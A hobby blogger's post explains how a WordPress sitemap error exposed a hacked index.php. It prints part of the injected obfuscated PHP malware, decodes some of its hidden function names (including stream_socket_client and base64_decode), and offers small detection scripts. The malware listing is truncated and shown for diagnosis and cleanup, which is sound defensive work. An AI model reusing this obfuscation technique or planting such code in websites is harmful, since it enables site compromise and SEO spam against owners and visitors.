
How a Mere XML Sitemap Error Revealed A Shocking Fact

Introduction

An XML sitemap helps search engines crawl and index your blog. As a full-time network engineer and hobby blogger, I did not have much time to build my own sitemap. So, like most bloggers out there, I used a plugin to generate it.

This article shows you how a simple XML sitemap error can hide more than you think.

XML Sitemap error

For more than three months, I had been getting a weird XML sitemap error message:

XML declaration allowed only at the start of the document
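
The message means that something was sent before the `<?xml ...?>` line of the sitemap. A minimal sketch of how this could be checked offline, assuming the sitemap response has been saved as raw bytes (the function names and sample documents are made up for illustration):

```python
import xml.etree.ElementTree as ET


def bytes_before_xml_declaration(body: bytes) -> int:
    """Return how many bytes precede '<?xml' in body, or -1 if it is absent."""
    return body.find(b"<?xml")


def parses(body: bytes) -> bool:
    """Return True if a strict XML parser accepts the document."""
    try:
        ET.fromstring(body)
        return True
    except ET.ParseError:
        return False


# Hypothetical sitemap bodies: one clean, one with stray output in front.
clean = b'<?xml version="1.0" encoding="UTF-8"?>\n<urlset></urlset>'
broken = b"\n \n" + clean

print(bytes_before_xml_declaration(clean))   # 0
print(bytes_before_xml_declaration(broken))  # 3
print(parses(clean), parses(broken))         # True False
```

Any result other than 0 means some PHP file or plugin emitted output before the sitemap was generated.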


I first thought it was due to the Yoast SEO plugin, so I deactivated the Yoast-generated XML sitemap:

deactivating yoast seo xml sitemap

I then installed another sitemap plugin, which generated a correct (at least to my eyes) XML sitemap.

However, Google Search Console still flagged my blog pages as Soft 404. I spent whole weekends and vacation days trying to reverse-engineer the reason behind this rejection by Google.

blog pages are excluded from google

All the articles I read pointed to “thin content” or “redirecting 404 error” pages.

I was not really convinced.

So I tried something else: I removed my blog from AdSense and resubmitted it. Google rejected it, telling me there was something wrong:

google adsense team reply

Searching for solutions

After searching the Internet endlessly, I read on Stack Overflow that stray whitespace could have slipped into the functions.php file:

xml sitemap error possible solution 1
xml sitemap error possible solution 2
xml sitemap error possible solution 3

So I went through all the PHP files of my WordPress theme and looked for leading and trailing whitespace. I also tried pasting the PHP code from the above-mentioned solution into the theme’s index.php. No success.
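
Checking every file by hand is tedious. Here is a rough sketch of how the whitespace hunt could be automated, assuming the theme folder is available locally. The function names are my own, and the check only covers whitespace or a byte order mark before the first byte and extra whitespace after the last `?>`:

```python
from pathlib import Path


def stray_whitespace(source: bytes) -> list[str]:
    """List whitespace problems at the very start or end of one PHP file."""
    problems = []
    if source.startswith(b"\xef\xbb\xbf"):
        problems.append("UTF-8 byte order mark before <?php")
    elif source[:1].isspace():
        problems.append("whitespace before <?php")
    close = source.rfind(b"?>")
    if close != -1:
        tail = source[close + 2:]
        # PHP swallows a single newline right after ?>; anything beyond that
        # is sent to the browser as output.
        if tail.strip() == b"" and tail not in (b"", b"\n", b"\r\n"):
            problems.append("whitespace after closing ?>")
    return problems


def scan_theme(theme_dir: str) -> dict[str, list[str]]:
    """Check every .php file below theme_dir and return only the offenders."""
    findings = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        problems = stray_whitespace(path.read_bytes())
        if problems:
            findings[str(path)] = problems
    return findings
```

Calling `scan_theme()` with the path to a local copy of the theme returns a dictionary of suspicious files. An empty dictionary, as in my case, means the whitespace theory is probably a dead end.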

Then I deactivated all my WordPress plugins except Yoast and tried to generate the XML sitemap again. No success.

By pure coincidence (or maybe good attention to detail, LOL), I noticed something visually weird in the index.php file in the root folder of my blog’s web server. When I opened it in Notepad, it contained strange characters:

<?php
$O0__OOO0_0='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O0_0OO_O0_='granule';
$O__0OOO00_='1000147';
$O0_OO_O0_0=1160;
$O__O0O_00O='/bamboo\/(\d+)_birch_(\d+)\.jsp/is';
$O_0_OO_0O0='bamboo/{G}_birch_{L}.jsp';
$O__OO00O_0=1103;
$O0_0OOO_0_='atlantic.php';
$OOO0__0_0O=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_OO_00O_0=$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{38}.$OOO0__0_0O{6}.$OOO0__0_0O{18}.$OOO0__0_0O{23}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{2}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10};$O__0_0O0OO=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23}.$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{25};$O__0_OO00O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10};$O0__0O0OO_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{6}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{6};$O0O0_O0__O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{23}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{12}.$OOO0__0_0O{0}.$OOO0__0_0O{27};$OO_O0_0O_0=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{
30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{35}.$OOO0__0_0O{18}.$OOO0__0_0O{10};$O0OO0__0_O=$OOO0__0_0O{12}.$OOO0__0_0O{27}.$OOO0__0_0O{0}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{18}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{3}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{10};$O0_O__00OO=$OOO0__0_0O{38}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{16}.$OOO0__0_0O{18}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$OO_00__0OO=$OOO0__0_0O{31}.$OOO0__0_0O{10}.$OOO0__0_0O{10}.$OOO0__0_0O{16}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{18}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{26}.$OOO0__0_0O{29}.$OOO0__0_0O{19}.$OOO0__0_0O{18}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{20};$O0_0_O0O_O=$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{29}.$OOO0__0_0O{30}.$OOO0__0_0O{17}.$OOO0__0_0O{12}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$O0O_OO__00=$OOO0__0_0O{32}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0};$OO0OO0__0_=$OOO0__0_0O{33}.$OOO0__0_0O{18}.$OOO0__0_0O{3}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30};$OOO__00O_0=$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{10};$O_0O__0O0O=$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{
10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{12}.$OOO0__0_0O{10};$O_00O0O_O_=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{32}.$OOO0__0_0O{31}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23};$OOOO0_0__0=$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{31}.$OOO0__0_0O{35}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{3}.$OOO0__0_0O{20}.$OOO0__0_0O{0}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{30};$O0O__0_OO0=$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{22}.$OOO0__0_0O{36}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{26}.$OOO0__0_0O{30};$O0O_0O_0O_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.
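
The listing above is cut off, but the visible part already shows the trick: `urldecode()` produces a 42-character lookup string, and every later variable is built by picking characters out of it by position (the `{n}` string offsets are old PHP syntax). A small sketch that replays this outside PHP, using only values copied from the listing; the `decode` helper is my own:

```python
from urllib.parse import unquote

# The percent-encoded string passed to urldecode() in the injected code.
ENCODED = (
    "%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B"
    "%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A"
)
ALPHABET = unquote(ENCODED)  # the lookup string the code indexes into


def decode(indexes: list[int]) -> str:
    """Rebuild a hidden name from the {n} offsets used in the listing."""
    return "".join(ALPHABET[i] for i in indexes)


# Offset lists copied from three of the assignments above.
print(decode([16, 24, 30, 27, 29, 24, 30, 16, 23, 6, 32, 30, 29,
              32, 6, 23, 23, 3, 6, 32, 25]))          # preg_replace_callback
print(decode([33, 10, 24, 30, 6, 5, 29, 33, 35, 32, 25, 30, 10,
              29, 32, 23, 12, 30, 0, 10]))            # stream_socket_client
print(decode([3, 6, 33, 30, 22, 36, 29, 26, 30, 32, 35, 26, 30]))  # base64_decode
```

So the “strange characters” are ordinary PHP function names in disguise, including ones for opening network connections and decoding hidden payloads. That is not something a stock index.php needs.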

Running a quick Google search to check the indexing status of my blog, I was shocked to see Chinese characters on my site:

chinese symbols popping up on my blog
still other chinese symbols popping up on my blog

What the fuck are Chinese characters doing on my blog?

Then I remembered an incident from last October: I had received a notification from Google Search Console that someone had been added as a property owner:

new property owner was probably a hacker

Since I was on public transport on the way to work (and I have no time for blogging during the day), I could not do anything until late that evening. I removed a weird TXT file from the root of the server and changed my passwords. I thought I had solved the issue and defeated the hacker.

Wrong! Now I am convinced that my blog was hacked and left with hidden anomalies!

My first instinct was to back this file up, delete the “alien” characters and restore a clean index.php file:

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

I generated the Yoast XML Sitemap file again. Bingo!

new xml sitemap generated

And Google is now happy with the result (the screenshot below is in German; the message means “indexing requested”):

live URL verification leads to a good result

Conclusion

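In my case, the solution to the error “XML declaration allowed only at the start of the document” was to repair a compromised index.php file. The injected code most likely sent output ahead of the sitemap’s XML declaration, which is exactly what the error complains about. I don’t know how I missed this. Maybe I should consider a course on WordPress security.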
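
In hindsight, a simple automated check could have caught this earlier. The following is only a heuristic sketch, not a malware scanner: it assumes that variable names made up solely of `O`, `0` and `_`, like the ones in my infected index.php, are a sign of obfuscation. The pattern, the threshold and the function names are my own choices.

```python
import re

# Assumption: names of 8+ characters consisting only of "O", "0" and "_",
# as in the injected code shown earlier, indicate obfuscation.
OBFUSCATED_VAR = re.compile(r"\$[O0_]{8,}\b")


def count_suspicious_variables(php_source: str) -> int:
    """Count distinct variable names that match the obfuscation pattern."""
    return len(set(OBFUSCATED_VAR.findall(php_source)))


def looks_obfuscated(php_source: str, threshold: int = 3) -> bool:
    """Flag a file once it holds at least `threshold` suspicious names."""
    return count_suspicious_variables(php_source) >= threshold


# Three lines taken from the infected file, and the clean index.php body.
injected = "<?php\n$O0_0OO_O0_='granule';\n$O__0OOO00_='1000147';\n$O0_OO_O0_0=1160;\n"
clean = (
    "<?php\ndefine( 'WP_USE_THEMES', true );\n"
    "require( dirname( __FILE__ ) . '/wp-blog-header.php' );\n"
)

print(looks_obfuscated(injected))  # True
print(looks_obfuscated(clean))     # False
```

A check like this only knows the one pattern I happened to find, so a clean result does not prove that a site is clean.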

References

  • https://github.com/Yoast/wordpress-seo/issues/7105
  • https://yoast.com/help/how-to-check-for-plugin-conflicts/
  • https://stackoverflow.com/questions/5479533/problem-xml-declaration-allowed-only-at-the-start-of-the-document
  • https://stackoverflow.com/questions/14685893/xml-declaration-allowed-only-at-the-start-of-the-document
  • https://www.searchenginejournal.com/google-search-console-index-coverage-report-guide/346514/
  • https://support.google.com/webmasters/answer/181708?
  • https://www.reliablesoft.net/soft-404/
  • https://www.hallaminternet.com/what-are-soft-404-errors-will-they-affect-rankings/
  • https://seo-radio.de/google-behandelt-ausverkaufte-produktseiten-als-soft-404/
  • https://pepperlandmarketing.com/blog/fix-soft-404-errors/
  • https://forum.webflow.com/t/submitted-url-seems-to-be-a-soft-404/53674

copyright 2020 keyboardbanger.com